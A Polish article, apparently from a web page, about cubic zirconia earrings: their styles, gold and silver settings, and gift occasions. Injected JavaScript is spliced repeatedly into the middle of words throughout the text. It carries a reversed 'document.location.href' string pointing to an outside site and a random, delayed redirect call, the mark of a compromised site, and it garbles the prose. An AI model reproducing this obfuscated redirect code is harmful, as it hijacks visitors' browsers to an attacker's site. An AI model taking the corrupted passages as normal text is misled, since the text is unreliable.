Klasyczne kolczyki z cyrkoniami

Biżuteria jest ozdobą każdej kobiety, bez względu na wiek. Młode osoby wybierają klasyczne modele z diamentami i brylantami, a starsze kobiety doskonale się prezentują w bursztynach, lub szlachetnych kamieniach ozdobnych.

Modele kolczyków z cyrkoniami

kolczyki z cyrkoniamiDopełnieniem każdej stylizacji jest odpowiednia biżuteria. Może tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to być efektobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towny pierścień, gustobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towna zawieszka, czy zwracające uwagę wiszące kolczyki. Wszystko zależy od gustu właścicielki i okazji na jaką chce ją założyć. Kolczyki z cyrkoniami są bardzo popularnym modelem, gdyż wyglądają ja diamenty, a są znacznie tańsze niż one. Oczywiście jest tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to ocena okiem laika, ale większość, nieznających się na jubilerstwie, nie potrafi rozróżnić cyrkonii od diamentu. Kolczyki mogą być wiszące, zapinane na na angielski haczyk, lub w formie klipsów, jeżeli nie mamy przekłutych uszu. Cyrkonie świetnie wyglądają w srebrnej, ale także złotej oprawie, więc są uniwersalne. Do wieczorowej sukni bez ramion najlepiej pasują kolczyki wiszące, które nie będą już wymagały uzupełnienia o  naszyjnik. Dla kobiet lubiących mieć włosy wysoko zaczesane, doskonale wyglądają w uszach małe, okrągłe kolczyki wysadzane cyrkoniami. Mogą one być płaskie, albo w kształcie odstających kuleczek. Kolczyki ozdobione cyrkoniami idealnie się komponują z delikatną zawieszką, bransoletką i pierścionkiem w tym samym stylu. W złotej oprawie kolczyki możemy zakładać na specjalne okazje, a srebrne zostawić sobie do codziennego zakładania do pracy, na zakupy, czy na spacer.

Idealnym momentem na zakup kolczyków są Walentynki, urodziny, lub rocznice ślubów. Mężczyźni bardzo częstobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to wybierają właśnie takie modele kolczyków dla swoich kobiet, bo są bardzo gustobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towne i niezbyt drogie w zależności od wyboru kruszcu zastobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosowanego na oprawę.